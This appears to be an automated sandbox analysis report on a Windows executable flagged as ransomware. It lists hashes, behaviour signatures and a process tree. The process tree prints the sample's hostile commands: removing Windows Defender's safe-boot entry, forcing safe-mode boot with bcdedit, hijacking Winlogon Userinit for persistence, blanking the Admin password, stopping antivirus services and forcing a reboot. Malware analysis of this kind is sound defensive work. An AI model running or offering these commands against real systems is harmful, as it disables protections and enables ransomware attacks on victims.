Overview

overview

10

Static

static

10

c460fc0d4f...50.exe

windows7_x64

c460fc0d4f...50.exe

windows10_x64

10

Analysis

  • max time kernel
    7s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    07-09-2020 10:13

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

  • Size

    87KB

  • MD5

    d6d956267a268c9dcf48445629d2803e

  • SHA1

    cc0feae505dad9c140dd21d1b40b518d8e61b3a4

  • SHA256

    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850

  • SHA512

    e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee

Score
10/10
ransomwareevasionpersistencetrojan

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
    ransomwareevasion
  • Windows security modification 2 TTPs 1 IoCs
    evasiontrojan
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 675 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
    "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"
    1⤵
    • Windows security modification
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Windows\system32\reg.exe
      "reg.exe" delete HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend /f
      2⤵
      • Modifies registry key
      PID:1668
    • C:\Windows\system32\bcdedit.exe
      "bcdedit.exe" /set {default} safeboot network
      2⤵
      • Modifies boot configuration data using bcdedit
      PID:1800
    • C:\Windows\system32\reg.exe
      "reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe","C:\Windows\system32\userinit.exe" /f
      2⤵
      • Modifies WinLogon for persistence
      PID:1808
    • C:\Windows\system32\net.exe
      "net.exe" user Admin ""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1836
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user Admin ""
        3⤵
          PID:1744
      • C:\Windows\system32\shutdown.exe
        "shutdown.exe" /r /t 0
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1852
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" Get-MpPreference -verbose
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1768
      • C:\Windows\system32\net.exe
        "net.exe" stop avpsus /y
        2⤵
          PID:564
        • C:\Windows\system32\net.exe
          "net.exe" stop McAfeeDLPAgentService /y
          2⤵
            PID:648
          • C:\Windows\system32\net.exe
            "net.exe" stop mfewc /y
            2⤵
              PID:576
            • C:\Windows\system32\net.exe
              "net.exe" stop BMR Boot Service /y
              2⤵
                PID:788
            • C:\Windows\system32\LogonUI.exe
              "LogonUI.exe" /flags:0x0
              1⤵
                PID:1532
              • C:\Windows\system32\LogonUI.exe
                "LogonUI.exe" /flags:0x1
                1⤵
                  PID:1220

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • memory/564-36-0x0000000000000000-mapping.dmp

                  Download

                • memory/576-38-0x0000000000000000-mapping.dmp

                  Download

                • memory/648-37-0x0000000000000000-mapping.dmp

                  Download

                • memory/788-39-0x0000000000000000-mapping.dmp

                  Download

                • memory/1124-1-0x0000000000870000-0x0000000000871000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1124-0-0x000007FEF5B80000-0x000007FEF656C000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/1532-22-0x0000000002A50000-0x0000000002A51000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1532-26-0x0000000002A50000-0x0000000002A51000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1532-25-0x0000000002A50000-0x0000000002A51000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1532-12-0x0000000002A50000-0x0000000002A51000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1668-3-0x0000000000000000-mapping.dmp

                  Download

                • memory/1744-9-0x0000000000000000-mapping.dmp

                  Download

                • memory/1768-11-0x0000000001F30000-0x0000000001F31000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1768-14-0x000000001AD30000-0x000000001AD31000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1768-23-0x0000000002010000-0x0000000002011000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1768-10-0x000007FEF5B80000-0x000007FEF656C000-memory.dmp

                  Filesize

                  9.9MB

                  Download

                • memory/1768-8-0x0000000000000000-mapping.dmp

                  Download

                • memory/1800-4-0x0000000000000000-mapping.dmp

                  Download

                • memory/1808-5-0x0000000000000000-mapping.dmp

                  Download

                • memory/1836-6-0x0000000000000000-mapping.dmp

                  Download

                • memory/1852-7-0x0000000000000000-mapping.dmp

                  Download